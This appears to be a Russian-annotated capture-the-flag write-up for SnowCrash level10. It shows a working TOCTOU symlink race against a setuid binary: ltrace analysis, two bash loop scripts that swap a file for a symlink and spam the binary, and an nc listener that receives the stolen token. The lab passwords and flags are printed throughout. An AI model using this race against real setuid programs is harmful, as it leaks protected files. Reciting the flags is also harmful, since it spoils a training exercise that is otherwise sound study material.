su level10
s5cAJpM8ev6XHw998pRWG728z

level10@SnowCrash:~$ ls -la
-rwsr-sr-x+ 1 flag10  level10 10817 Mar  5  2016 level10
-rw-------  1 flag10  flag10     26 Mar  5  2016 token


./level10 file host
        sends file to host if you have access to it

level10@SnowCrash:~$ ./level10 token 192.168.56.105
You don't have access to token


level10@SnowCrash:~$ touch /tmp/1
level10@SnowCrash:~$ ./level10 /tmp/1 192.168.56.105
Connecting to 192.168.56.105:6969 .. Unable to connect to host 192.168.56.105

level10@SnowCrash:~$ ltrace ./level10 /tmp/1 192.168.56.105
__libc_start_main(0x80486d4, 3, 0xbffff7c4, 0x8048970, 0x80489e0 <unfinished ...>
access("/tmp/1", 4)                                                                                                               = 0
printf("Connecting to %s:6969 .. ", "192.168.56.105")                                                                             = 37
fflush(0xb7fd1a20Connecting to 192.168.56.105:6969 .. )                                                                                                                = 0
socket(2, 1, 0)                                                                                                                   = 3
inet_addr("192.168.56.105")                                                                                                       = 0x6938a8c0
htons(6969, 1, 0, 0, 0)                                                                                                           = 14619
connect(3, 0xbffff70c, 16, 0, 0)                                                                                                  = -1
printf("Unable to connect to host %s\n", "192.168.56.105"Unable to connect to host 192.168.56.105)   
                                                                     = 41
вызывает функцию acces() который  вызывает функцию open() который открывает файл на мнгновение 
и пытается соедениться по порту 6969

откроем еще два окна терминала и авторизуемся 10 лвлом
ssh level10@192.168.56.105 -p4242
s5cAJpM8ev6XHw998pRWG728z

создаем три скрипта. в первом в цикле создаем файл удаляем его, создаем ссылку на наш токен с тем же именем что и файл который только что удалили
во втором скрипте в цикле запускаем наш бинарник с нашим файлом который создается в первом скрипте, надеемся что функция acces откроет файл с помощю функции опен, но туда попадает наша ссылка

1. создаем и запускаем скрипт на создание файла и ссылки

vim /tmp/script

#!/usr/bin/env bash
while true
do
	touch /tmp/token
	rm -f /tmp/token
	ln -s /home/user/level10/token /tmp/token
	rm -f /tmp/token
done

chmod +x /tmp/script
sh /tmp/script 

2. создаем скрипт для спама

vim /tmp/smap

#!/usr/bin/env bash
while true
do
	/home/user/level10/level10 /tmp/token 192.168.56.105
done

sh /tmp/smap

3. утилитой netcat слушаем порт 6969 https://ru.wikipedia.org/wiki/Netcat 
nc -lk 6969

проскакивает токен
woupa2yuojeeaaed06riuj63c

su flag10
woupa2yuojeeaaed06riuj63c

flag10@SnowCrash:~$ getflag
Check flag.Here is your token : feulo4b72j7edeahuete3no7c